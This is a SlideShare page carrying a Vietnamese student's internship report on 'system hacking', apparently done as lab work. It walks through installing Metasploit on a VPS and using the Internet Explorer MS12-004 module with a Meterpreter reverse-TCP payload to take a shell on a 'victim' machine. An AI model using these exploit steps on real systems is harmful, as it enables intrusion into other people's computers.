SlideShare a Scribd company logo

Bao caocuoiki

Download as PPTX, PDF
Nguyễn Minh Tiến
Nguyễn Minh Tiến
1 of 19
Đề tài: System Hacking Sinh viên: Trần Văn Vịnh Nguyễn Minh Tiến
 Mục tiêu: Thực hiện tấn công máy Victeam thông qua máy chủ ảo VPS.  Nội dung: - Cài đặt Metasploit Framework trên VPS. - Khai thác lỗi Internet Explorer thông qua VPS (ms12_004). - Khai thác lỗi Microsoft Word MS12_027 qua VPS. - Demo lỗi. - Cảm nhận và kinh nghiệm rút ra sau kì thực tập.
I. Setup MSF trên VPS  Bước 1 : Truy cập vào VPS bằng Remote Desktop Connection
 Bước 2 : Download và cài đặt MSF trên VPS qua trang chủ: http://www.metasploit.com I. Setup MSF trên VPS
 Sau khi tải về ta chạy file setup đúng với HDH của VPS. Lưu ý : Tắt các chương trình diệt virus và firewall trước khi cài .  Kết quả khi hoàn thành cài đặt I. Setup MSF trên VPS
II. Khai thác lỗi Internet Explorer ms12_004  Đầu tiên ta đăng nhập vào máy chủ ảo VPS và chạy MSF
 Gõ search ms12_024 để tìm mã lỗi II. Khai thác lỗi Internet Explorer ms12_004
 Use exploit/windows/brower/ms12_004_midi II. Khai thác lỗi Internet Explorer ms12_004
 Set payload windows/meterpreter/reverse_tcp II. Khai thác lỗi Internet Explorer ms12_004
 Set srvhost và lhost = “ ip của máy tấn công “. (ở đây là ip của máy chủ ảo VPS) II. Khai thác lỗi Internet Explorer ms12_004
 Set uripath =” đường dẫn “ . II. Khai thác lỗi Internet Explorer ms12_004
 Và exploit để khởi động server II. Khai thác lỗi Internet Explorer ms12_004
 Lấy máy nạn nhân truy cập vào đường dẫn mà ta đã tạo ra II. Khai thác lỗi Internet Explorer ms12_004
 Sau một khoảng thời gian => Xâm nhập thành công máy nạn nhân . II. Khai thác lỗi Internet Explorer ms12_004
 Dùng lệnh sessions –I “ id của session muốn vào “ để thực hiện tấn công .  Lệnh sysinfo để xem thông tin máy và lệnh shell để điều khiển cmd của máy nạn nhân . II. Khai thác lỗi Internet Explorer ms12_004
III. Khai thác lỗi Office word MS12_027  Demo chương trình: https://www.youtube.com/watch?v=IH11i482w5o
IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập Bổ ích và lý thú Cảm nhận Đem lại nhiều kinh nghiệm Môi trường làm việc thân thiện Thầy cô tận tình với SV
 Kinh nghiệm rút ra: - Làm việc theo nhóm giúp hoàn thành công việc hiệu quả và dễ dàng hơn. - Nâng cao được khả năng tìm hiểu, chọn lọc thông tin cần thiết đối với đề tài của mình. - Nâng cao khả năng làm việc độc lập, biết cách tư duy chín chắn để có thể tự khắc phục 1 số lỗi cần thiết. IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập
Bao caocuoiki

Recommended

Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Cai dat kali tren vmware
Cai dat kali tren vmwareCai dat kali tren vmware
Cai dat kali tren vmwarenguyenhoangduclam239
 
Bao cao tttn an ninh web
Bao cao tttn an ninh webBao cao tttn an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Vo Ve Vi Vu
 
Report week 3
Report week 3Report week 3
Report week 3Liên Hán
 
Bao cao
Bao caoBao cao
Bao caoNguyễn Minh Tiến
 

Recommended

Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Cai dat kali tren vmware
Cai dat kali tren vmwareCai dat kali tren vmware
Cai dat kali tren vmwarenguyenhoangduclam239
 
Bao cao tttn an ninh web
Bao cao tttn an ninh webBao cao tttn an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Vo Ve Vi Vu
 
Report week 3
Report week 3Report week 3
Report week 3Liên Hán
 
Bao cao
Bao caoBao cao
Bao caoNguyễn Minh Tiến
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comSql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comphanleson
 
Kali linux
Kali linuxKali linux
Kali linuxTân Trần
 
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013Security Bootcamp
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2Thiên Nguyễn
 
Tim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongTim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongVu Trung Kien
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2Phuong Ngo
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Kiểm thử bảo mật web
Kiểm thử bảo mật webKiểm thử bảo mật web
Kiểm thử bảo mật webMinh Tri Nguyen
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
1
11
1Chuc Thanh
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006xeroxk
 
Botnet slide
Botnet slideBotnet slide
Botnet slideLoc Nguyen
 
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Hate To Love
 
семиотика цвета
семиотика цветасемиотика цвета
семиотика цветаKapranowa
 
Program teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyProgram teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyjuliana567
 

More Related Content

What's hot

Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comSql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comphanleson
 
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013Security Bootcamp
 
Tim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongTim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongVu Trung Kien
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2Phuong Ngo
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Kiểm thử bảo mật web
Kiểm thử bảo mật webKiểm thử bảo mật web
Kiểm thử bảo mật webMinh Tri Nguyen
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006xeroxk
 
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Hate To Love
 

What's hot (20)

Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comSql injection demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.com
 
Kali linux
Kali linuxKali linux
Kali linux
 
Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013Security Bootcamp 2013 owasp top 10- 2013
Security Bootcamp 2013 owasp top 10- 2013
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Tim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chongTim hieu ve lo hong web va cach phong chong
Tim hieu ve lo hong web va cach phong chong
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Kiểm thử bảo mật web
Kiểm thử bảo mật webKiểm thử bảo mật web
Kiểm thử bảo mật web
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
1
11
1
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
 

Viewers also liked

семиотика цвета
семиотика цветасемиотика цвета
семиотика цветаKapranowa
 
Program teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyProgram teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyjuliana567
 
Mengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternateMengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternateangga putra
 
VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16huntam0113
 
General volunteer training - Youth Conference
General volunteer training - Youth ConferenceGeneral volunteer training - Youth Conference
General volunteer training - Youth Conferencehuntam0113
 
Program pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahanProgram pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahanoviehuseinsn
 
Dimitropoulou georgia
Dimitropoulou georgiaDimitropoulou georgia
Dimitropoulou georgiamarina sym
 
Youth Conference Chaperone Training
Youth Conference Chaperone TrainingYouth Conference Chaperone Training
Youth Conference Chaperone Traininghuntam0113
 
Inventors and inventions from france
Inventors and inventions from franceInventors and inventions from france
Inventors and inventions from franceHakkim Shajahan
 
The importance-of-learning-french
The importance-of-learning-frenchThe importance-of-learning-french
The importance-of-learning-frenchHakkim Shajahan
 

Viewers also liked (16)

семиотика цвета
семиотика цветасемиотика цвета
семиотика цвета
 
Program teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okkyProgram teknologi informasi untuk aparatur kelurahan oleh okky
Program teknologi informasi untuk aparatur kelurahan oleh okky
 
Presentasi novi
Presentasi noviPresentasi novi
Presentasi novi
 
Mengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternateMengungkap sekilas dunia farmasi sejarah ternate
Mengungkap sekilas dunia farmasi sejarah ternate
 
Presentation3
Presentation3Presentation3
Presentation3
 
VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16VAASL presentation VRC 2015-16
VAASL presentation VRC 2015-16
 
General volunteer training - Youth Conference
General volunteer training - Youth ConferenceGeneral volunteer training - Youth Conference
General volunteer training - Youth Conference
 
Program pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahanProgram pelatihan teknologi informasi untuk aparatur kelurahan
Program pelatihan teknologi informasi untuk aparatur kelurahan
 
Dimitropoulou georgia
Dimitropoulou georgiaDimitropoulou georgia
Dimitropoulou georgia
 
Youth Conference Chaperone Training
Youth Conference Chaperone TrainingYouth Conference Chaperone Training
Youth Conference Chaperone Training
 
Alstom
AlstomAlstom
Alstom
 
Studyinfrance
StudyinfranceStudyinfrance
Studyinfrance
 
Top 10 foods of france
Top 10 foods of franceTop 10 foods of france
Top 10 foods of france
 
Inventors and inventions from france
Inventors and inventions from franceInventors and inventions from france
Inventors and inventions from france
 
Alcatel lucent
Alcatel lucentAlcatel lucent
Alcatel lucent
 
The importance-of-learning-french
The importance-of-learning-frenchThe importance-of-learning-french
The importance-of-learning-french
 

Similar to Bao caocuoiki

BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3VNG
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477oncestar
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3eragon226
 
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015laonap166
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpTrần Hiệu
 
Báo Cáo Hàng Tuần
Báo Cáo Hàng TuầnBáo Cáo Hàng Tuần
Báo Cáo Hàng TuầnBin Hoo
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationducmanhkthd
 
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Thanh Tuan Ngo
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 

Similar to Bao caocuoiki (20)

Tuan5
Tuan5Tuan5
Tuan5
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
Ceh phan3
Ceh phan3Ceh phan3
Ceh phan3
 
ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3ceh-lab_book_tieng_viet_phan3
ceh-lab_book_tieng_viet_phan3
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3Ceh lab book_tieng_viet_phan3
Ceh lab book_tieng_viet_phan3
 
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
 
Báo Cáo Hàng Tuần
Báo Cáo Hàng TuầnBáo Cáo Hàng Tuần
Báo Cáo Hàng Tuần
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
 
Bao cao
Bao caoBao cao
Bao cao
 
Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5Bao cao thuc tap tuan 5
Bao cao thuc tap tuan 5
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 

Bao caocuoiki

  • 1. Đề tài: System Hacking Sinh viên: Trần Văn Vịnh Nguyễn Minh Tiến
  • 2.  Mục tiêu: Thực hiện tấn công máy Victeam thông qua máy chủ ảo VPS.  Nội dung: - Cài đặt Metasploit Framework trên VPS. - Khai thác lỗi Internet Explorer thông qua VPS (ms12_004). - Khai thác lỗi Microsoft Word MS12_027 qua VPS. - Demo lỗi. - Cảm nhận và kinh nghiệm rút ra sau kì thực tập.
  • 3. I. Setup MSF trên VPS  Bước 1 : Truy cập vào VPS bằng Remote Desktop Connection
  • 4.  Bước 2 : Download và cài đặt MSF trên VPS qua trang chủ: http://www.metasploit.com I. Setup MSF trên VPS
  • 5.  Sau khi tải về ta chạy file setup đúng với HDH của VPS. Lưu ý : Tắt các chương trình diệt virus và firewall trước khi cài .  Kết quả khi hoàn thành cài đặt I. Setup MSF trên VPS
  • 6. II. Khai thác lỗi Internet Explorer ms12_004  Đầu tiên ta đăng nhập vào máy chủ ảo VPS và chạy MSF
  • 7.  Gõ search ms12_024 để tìm mã lỗi II. Khai thác lỗi Internet Explorer ms12_004
  • 8.  Use exploit/windows/brower/ms12_004_midi II. Khai thác lỗi Internet Explorer ms12_004
  • 9.  Set payload windows/meterpreter/reverse_tcp II. Khai thác lỗi Internet Explorer ms12_004
  • 10.  Set srvhost và lhost = “ ip của máy tấn công “. (ở đây là ip của máy chủ ảo VPS) II. Khai thác lỗi Internet Explorer ms12_004
  • 11.  Set uripath =” đường dẫn “ . II. Khai thác lỗi Internet Explorer ms12_004
  • 12.  Và exploit để khởi động server II. Khai thác lỗi Internet Explorer ms12_004
  • 13.  Lấy máy nạn nhân truy cập vào đường dẫn mà ta đã tạo ra II. Khai thác lỗi Internet Explorer ms12_004
  • 14.  Sau một khoảng thời gian => Xâm nhập thành công máy nạn nhân . II. Khai thác lỗi Internet Explorer ms12_004
  • 15.  Dùng lệnh sessions –I “ id của session muốn vào “ để thực hiện tấn công .  Lệnh sysinfo để xem thông tin máy và lệnh shell để điều khiển cmd của máy nạn nhân . II. Khai thác lỗi Internet Explorer ms12_004
  • 16. III. Khai thác lỗi Office word MS12_027  Demo chương trình: https://www.youtube.com/watch?v=IH11i482w5o
  • 17. IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập Bổ ích và lý thú Cảm nhận Đem lại nhiều kinh nghiệm Môi trường làm việc thân thiện Thầy cô tận tình với SV
  • 18.  Kinh nghiệm rút ra: - Làm việc theo nhóm giúp hoàn thành công việc hiệu quả và dễ dàng hơn. - Nâng cao được khả năng tìm hiểu, chọn lọc thông tin cần thiết đối với đề tài của mình. - Nâng cao khả năng làm việc độc lập, biết cách tư duy chín chắn để có thể tự khắc phục 1 số lỗi cần thiết. IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập